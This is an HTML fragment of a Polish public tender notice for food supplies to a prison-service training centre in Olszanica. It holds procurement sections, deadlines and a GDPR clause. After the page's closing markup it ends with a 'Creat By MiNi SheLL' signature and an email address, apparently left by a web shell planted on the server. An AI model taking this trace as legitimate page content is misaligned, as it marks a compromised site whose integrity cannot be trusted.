partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-09-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Ochrona danych osobowych:Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych osobowych jest Komendant Ośrodka Doskonalenia Kadr Służby Więziennej w Olszanicy, Olszanica 222, 38-722 Olszanica; • dane kontaktowe Inspektora Ochrony Danych Osobowych: e-mail: odk_olszanica@sw.gov.pl; tel. (013) 461 74 60, fax. (013) 460 10 19 • Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Dostawy artykułów ogólnospożywczych”, numer sprawy: DKw.2232.15.2020.SU prowadzonym w trybie przetargu nieograniczonego; • odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843), dalej „ustawa Pzp”; • Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; • obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; • w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; • posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych [1];− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO [2];− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; • nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. [1] Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.[2] Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com